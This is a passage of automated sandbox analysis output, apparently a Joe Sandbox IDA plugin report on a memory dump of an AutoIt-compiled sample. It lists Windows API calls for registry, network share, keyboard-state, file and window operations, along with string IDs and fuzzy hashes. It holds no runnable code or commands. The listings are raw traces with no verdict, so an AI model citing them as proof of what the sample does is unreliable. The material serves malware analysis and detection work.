                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00EED3A0
                                                                                                                                  • __swprintf.LIBCMT ref: 00EED3F3
                                                                                                                                  • _wprintf.LIBCMT ref: 00EED499
                                                                                                                                  • _wprintf.LIBCMT ref: 00EED4B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  • _memset.LIBCMT ref: 00EDAF74
                                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00EDAFA9
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00EDAFC5
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00EDAFE1
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00EDB00B
                                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 00EDB033
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EDB03E
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EDB043
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                  • API String ID: 1411258926-22481851
                                                                                                                                  • Opcode ID: 7b2539ca1d2fdf39a41001c57816e6cea9219f68b543650aef413b9ad5bad45d
                                                                                                                                  • Instruction ID: cb815cc992935d6696236807c3498d36350408fa51b7a8c4bcedb91bc4fee843
                                                                                                                                  • Opcode Fuzzy Hash: 7b2539ca1d2fdf39a41001c57816e6cea9219f68b543650aef413b9ad5bad45d
                                                                                                                                  • Instruction Fuzzy Hash: C2411976C1022DAACF11EBA4DC85DEEB7B8FF19704F04556AE901B6260EB70AE05CB51
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F02AA6,?,?), ref: 00F03B0E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                  • API String ID: 3964851224-909552448
                                                                                                                                  • Opcode ID: b9d43bb6bd88b583fd3b9c0e1aabc48ba67e035fcde3c8c123fe0ebf2708754c
                                                                                                                                  • Instruction ID: db9acfd199aa5e80b650a43467eede1a292309ddb21d505bdd007b3a85bcaddc
                                                                                                                                  • Opcode Fuzzy Hash: b9d43bb6bd88b583fd3b9c0e1aabc48ba67e035fcde3c8c123fe0ebf2708754c
                                                                                                                                  • Instruction Fuzzy Hash: AF4193351002498BEF09EF14DC51BEB33A9BF16354F185824EC51AB296EB30AE5AFB50
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00EE843F
                                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00EE8455
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EE8466
                                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00EE8478
                                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00EE8489
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SendString$_memmove
                                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                  • API String ID: 2279737902-1007645807
                                                                                                                                  • Opcode ID: 56fcdf98c2ec829638a3772dc7cd3b5208ed6ba7a653f0f446f35adf39c4bf7a
                                                                                                                                  • Instruction ID: 5cc3e1cb19f5dfde65b5c6a87f798de8e70c4049751cf7cdfe7bbaceb73c229f
                                                                                                                                  • Opcode Fuzzy Hash: 56fcdf98c2ec829638a3772dc7cd3b5208ed6ba7a653f0f446f35adf39c4bf7a
                                                                                                                                  • Instruction Fuzzy Hash: 54112771A4025D39D710A7A6DC4ADFF7BBCEFD6B40F000829B911B60C1DEA09E08C5B1
                                                                                                                                  APIs
                                                                                                                                  • timeGetTime.WINMM ref: 00EE809C
                                                                                                                                    • Part of subcall function 00EBE3A5: timeGetTime.WINMM(?,75C0B400,00F16163), ref: 00EBE3A9
                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00EE80C8
                                                                                                                                  • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00EE80EC
                                                                                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00EE810E
                                                                                                                                  • SetActiveWindow.USER32 ref: 00EE812D
                                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00EE813B
                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00EE815A
                                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 00EE8165
                                                                                                                                  • IsWindow.USER32 ref: 00EE8171
                                                                                                                                  • EndDialog.USER32(00000000), ref: 00EE8182
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                  • String ID: BUTTON
                                                                                                                                  • API String ID: 1194449130-3405671355
                                                                                                                                  • Opcode ID: 053f77438b6adfe4162e17e83ba46ac576675f1065ad21988ab6440134f516d7
                                                                                                                                  • Instruction ID: 2c6368d9b7adbafd6c6d1692646c9facb45c8430a7cb065f842b6bfc7d62c3ce
                                                                                                                                  • Opcode Fuzzy Hash: 053f77438b6adfe4162e17e83ba46ac576675f1065ad21988ab6440134f516d7
                                                                                                                                  • Instruction Fuzzy Hash: 9921937020024DBFF7229B22ED89A267B6AFB5438DF081114F529A2261CFB24D06BA51
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F13C64,00000010,00000000,Bad directive syntax error,00F3DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00EE32D1
                                                                                                                                  • LoadStringW.USER32(00000000,?,00F13C64,00000010), ref: 00EE32D8
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • _wprintf.LIBCMT ref: 00EE3309
                                                                                                                                  • __swprintf.LIBCMT ref: 00EE332B
                                                                                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00EE3395
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                  • API String ID: 1506413516-4153970271
                                                                                                                                  • Opcode ID: 651cd6ebb6e83548347f64e4d6b98462eb3c00650d8fbe15c0707394136a068b
                                                                                                                                  • Instruction ID: 0f2c327feb57a4a32099f91cea26ca660f09d541188f1b988842bacd5245e862
                                                                                                                                  • Opcode Fuzzy Hash: 651cd6ebb6e83548347f64e4d6b98462eb3c00650d8fbe15c0707394136a068b
                                                                                                                                  • Instruction Fuzzy Hash: 98214F3284021EBBDF11AFA0CC0AEEE7775BF19701F005456FA15B50A2DA72AA58EB51
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EEC6A0: __time64.LIBCMT ref: 00EEC6AA
                                                                                                                                    • Part of subcall function 00EA41A7: _fseek.LIBCMT ref: 00EA41BF
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00EEC96F
                                                                                                                                    • Part of subcall function 00EC297D: __wsplitpath_helper.LIBCMT ref: 00EC29BD
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EEC982
                                                                                                                                  • _wcscat.LIBCMT ref: 00EEC995
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00EEC9BA
                                                                                                                                  • _wcscat.LIBCMT ref: 00EEC9D0
                                                                                                                                  • _wcscat.LIBCMT ref: 00EEC9E3
                                                                                                                                    • Part of subcall function 00EEC6E4: _memmove.LIBCMT ref: 00EEC71D
                                                                                                                                    • Part of subcall function 00EEC6E4: _memmove.LIBCMT ref: 00EEC72C
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EEC92A
                                                                                                                                    • Part of subcall function 00EECE59: _wcscmp.LIBCMT ref: 00EECF49
                                                                                                                                    • Part of subcall function 00EECE59: _wcscmp.LIBCMT ref: 00EECF5C
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EECB8D
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EECC24
                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EECC3A
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EECC4B
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EECC5D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 152968663-0
                                                                                                                                  • Opcode ID: 30919be7581d75311e9a7275539974df3c809c4dd295f050bcb4514389124991
                                                                                                                                  • Instruction ID: 1f26afc10b16e620c6da0e0bd2a88deda6727d0841b6dff799f4dc5de405264e
                                                                                                                                  • Opcode Fuzzy Hash: 30919be7581d75311e9a7275539974df3c809c4dd295f050bcb4514389124991
                                                                                                                                  • Instruction Fuzzy Hash: D6C139B190022DAECF10DFA5CC81EEEB7B9AF99310F1050AAB609F6151D7719A85CF61
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3566271842-0
                                                                                                                                  • Opcode ID: 70141c6f451a98977c787f8d4d38f8071c6b2110586870653ad2226c5489a299
                                                                                                                                  • Instruction ID: a4bf14eba10d05c44df62ac263ce3d3061c0df15521ce3c1624a0893a8984a41
                                                                                                                                  • Opcode Fuzzy Hash: 70141c6f451a98977c787f8d4d38f8071c6b2110586870653ad2226c5489a299
                                                                                                                                  • Instruction Fuzzy Hash: 47712D75900219AFDB10DFA4C984AEEB7F8EF49314F149495E919BB252D730EE41CF90
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00EE3908
                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00EE3973
                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00EE3993
                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00EE39AA
                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00EE39D9
                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00EE39EA
                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00EE3A16
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00EE3A24
                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00EE3A4D
                                                                                                                                  • GetKeyState.USER32(00000012), ref: 00EE3A5B
                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00EE3A84
                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00EE3A92
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                  • Opcode ID: bf1da4c8ac417866da6b6eb5190b3ccf39fc8729484bd7d81d8c808ca260e06c
                                                                                                                                  • Instruction ID: f69a05c4f17027ef42a4c3d048c3af96d3286d4d9c02eb506973eb691d2dc2ae
                                                                                                                                  • Opcode Fuzzy Hash: bf1da4c8ac417866da6b6eb5190b3ccf39fc8729484bd7d81d8c808ca260e06c
                                                                                                                                  • Instruction Fuzzy Hash: 7251F660A047CC29FB35EBB288057AABBF45F01348F08559ED5C66B1C2DB549B8CC766
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00EDFB19
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00EDFB2B
                                                                                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00EDFB89
                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00EDFB94
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00EDFBA6
                                                                                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00EDFBFC
                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00EDFC0A
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00EDFC1B
                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00EDFC5E
                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00EDFC6C
                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EDFC89
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00EDFC96
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3096461208-0
                                                                                                                                  • Opcode ID: 0a64d2b5390ea6f4e4e28c649ff6f9acaad6dff8f3676b4643e79c0b7f2fe2e8
                                                                                                                                  • Instruction ID: a1ee18adb80c961b2e45f2fd966d778034de39d68d036df2ea2dbdc8a895d82c
                                                                                                                                  • Opcode Fuzzy Hash: 0a64d2b5390ea6f4e4e28c649ff6f9acaad6dff8f3676b4643e79c0b7f2fe2e8
                                                                                                                                  • Instruction Fuzzy Hash: B2510171B00209AFDB18CF69DD95EAEBBBAEB88715F14813DF916E7290D7709D018B10
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBB155: GetWindowLongW.USER32(?,000000EB), ref: 00EBB166
                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00EBB067
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ColorLongWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 259745315-0
                                                                                                                                  • Opcode ID: 273fedc602dcb434fff05d8ed2cfa2da362aa2152774b4f59bb9a4b5f6670ff7
                                                                                                                                  • Instruction ID: 701f6b50129bdb6891b65b42d11221f9fc4d08930e09963cf355bbd24eabc32e
                                                                                                                                  • Opcode Fuzzy Hash: 273fedc602dcb434fff05d8ed2cfa2da362aa2152774b4f59bb9a4b5f6670ff7
                                                                                                                                  • Instruction Fuzzy Hash: D941AD31500504EFDB306F28D899BFB3B66AB06735F184261FD759A1E2C7B18C42EB21
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 136442275-0
                                                                                                                                  • Opcode ID: 6bd54b9565f07e37c45659dbebab43c1e68f77be432ee6b714169b364b3700e5
                                                                                                                                  • Instruction ID: 3fe4f489b8735b8c3b36a1f813770803bd34b97699ca491cd3833a17e04cfdb7
                                                                                                                                  • Opcode Fuzzy Hash: 6bd54b9565f07e37c45659dbebab43c1e68f77be432ee6b714169b364b3700e5
                                                                                                                                  • Instruction Fuzzy Hash: F4412EB280416CAADF21EB50DD41EDE73FCAB48310F1051EAB519B2051EB31ABD5CF60
                                                                                                                                  APIs
                                                                                                                                  • __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                  • __itow.LIBCMT ref: 00EA8519
                                                                                                                                    • Part of subcall function 00EC2177: _xtow@16.LIBCMT ref: 00EC2198
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __itow__swprintf_xtow@16
                                                                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                                                                  • API String ID: 1502193981-2263619337
                                                                                                                                  • Opcode ID: d7120c8b645e414a1d4f9da94e94430c65cd8ba32571f6cb23037852f9e6acc7
                                                                                                                                  • Instruction ID: 9731dd8fe970148e6e610769e9eb622eeab6ad5e8a009e0bc30fb1b16e4572d3
                                                                                                                                  • Opcode Fuzzy Hash: d7120c8b645e414a1d4f9da94e94430c65cd8ba32571f6cb23037852f9e6acc7
                                                                                                                                  • Instruction Fuzzy Hash: 26415571900605DFDB24DB38D941FAAB7E5BF8D710F24446EE549EB181EA32EA82DB10
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00EC5CCA
                                                                                                                                    • Part of subcall function 00EC889E: __getptd_noexit.LIBCMT ref: 00EC889E
                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00EC5D63
                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00EC5D99
                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00EC5DB6
                                                                                                                                  • __allrem.LIBCMT ref: 00EC5E0C
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EC5E28
                                                                                                                                  • __allrem.LIBCMT ref: 00EC5E3F
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EC5E5D
                                                                                                                                  • __allrem.LIBCMT ref: 00EC5E74
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EC5E92
                                                                                                                                  • __invoke_watson.LIBCMT ref: 00EC5F03
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 384356119-0
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00EE5816
                                                                                                                                  • GetMenuItemInfoW.USER32(00F618F0,000000FF,00000000,00000030), ref: 00EE5877
                                                                                                                                  • SetMenuItemInfoW.USER32(00F618F0,00000004,00000000,00000030), ref: 00EE58AD
                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00EE58BF
                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00EE5903
                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00EE591F
                                                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00EE5949
                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00EE598E
                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EE59D4
                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE59E8
                                                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE5A09
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4176008265-0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F09AA5
                                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F09AA8
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F09ACC
                                                                                                                                  • _memset.LIBCMT ref: 00F09ADD
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F09AEF
                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F09B67
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$LongWindow_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 830647256-0
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00EE3591
                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00EE3612
                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00EE362D
                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00EE3647
                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00EE365C
                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00EE3674
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00EE3686
